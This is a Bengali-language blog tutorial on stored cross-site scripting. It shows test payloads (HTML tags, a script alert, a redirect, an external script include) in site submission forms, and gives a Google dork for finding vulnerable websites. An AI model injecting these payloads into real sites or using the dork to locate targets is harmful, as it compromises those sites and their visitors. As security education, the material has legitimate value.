পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিং

আজকে কথা বলব  পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিং নিয়ে, ডোম বেজড স্ক্রিপ্টীং নিয়ে কথা বলার কথা ছিল কিন্তু ডোম বেজড এক্স এক্স এস পার্সিস্টেন্ট আর নন পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিং এর ভ্যারিয়েন্ট। এই টিউটোরিয়াল কারো কোন ক্ষতি করার উদ্দেশ্যে ব্যাবহার না করার অনুরোধ করছি।

আমরা দেখব পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিং এ একটা ওয়েব সাইটে কি কি করা যায়, আর কিভাবে বুঝতে হয়।

পার্সিস্টেন্ট ক্রস সাইট স্ক্রিপ্টিংএ ম্যালিশিয়াস কোড ওয়েব সাইটের ডাটা বেজে স্টোর করা যায়। পার্সিস্টেন্ট স্ক্রিপ্টিংএ অনেক ট্রিকি ক্রাফ্ট আছে সেগুলো নিয়ে পরে কথা বলব। এখন আমাদের বুঝতে হবে পার্সিস্টেন্ট বাগ কোথায় পাওয়া যাবে।

 কমেন্ট, সাবমিট ফর্ম, পোস্ট, কন্ট্যাক্ট, সাবমিশন বক্স সাইটের যে অংশ গুলো ডাটাবেজের সাথে সম্পৃক্ত সে জায়গা গুলো টেস্ট করতে হবে।

উপরে যে সাবমিশন বক্স দেখছেন, যেখানে নাম চাওয়া হচ্ছে আমরা এটা টেস্ট করে দেখব। প্রথমেই <i> ট্যাগ ব্যাবহার করে দেখা যাক। সাবমিট বক্সে ট্যাগ বসানোর পর সাবমিট বাটনে ক্লিক করব।

ট্যাগ ব্যাবহারের পর কি কোন পরিবর্তন চোখে পড়ছে? ট্যাগ ব্যাবহারের পর মোর ইনফরমেশন শব্দ দুটি ডান দিকে বেকে গেছে। এবার ফন্ট কালার চেঞ্জের ট্যাগ ব্যাবহার করে দেখা যাক। <font color="red"> লিখে সাবমিট বাটনে ক্লিক করব।

 দেখুন রঙ বদলে গেছে। এখন স্ক্রিপ্ট ট্যাগ ব্যাবহার করব, স্ক্রিপ্টে একটা পপ আপ এল্যার্ট থাকবে। <script>alert("Vulnerable To XSS")</script>

এবার আমরা একটা রিডাইরেক্ট ব্যাবহার করে দেখব।

এটা আমাদের গুগল সার্চে রিডাইরেক্ট করবে।

মাঝে মাঝে ইনপুট টেক্সট লিমিটেশন থাকে, আপনি চাইলে স্ক্রিপ্ট ট্যাগে জাভাস্ক্রিপ্ট ফাইল লিংক করে দিতে পারেন এভাবে <script src="https://www.YourSite.com/xss.js></script>

ভূলনার্বাল ওয়েবসাইট খুজে বের করতে গুগল ডর্ক ব্যাবহার করতে পারেন।

• inurl:.com/search.asp

আজ এ পর্যন্তই, পরের পোস্টে আরো এডভান্স জিনিষ শেখানোর চেষ্টা করব। এই টিউটোরিয়াল কারো ক্ষতির উদ্দ্যেশ্য ব্যাবহার না করার অনুরোধ আবারো করছি।

 সেমিস্টার ফাইনাল নিয়ে ব্যাস্ত ছিলাম টিউটোরিয়াল লেখার সময় হচ্ছিল না। কারো কোন প্রশ্ন থাকলে ব্লগে কমেন্ট করুন, আমি উত্তর দিতে চেষ্টা করব।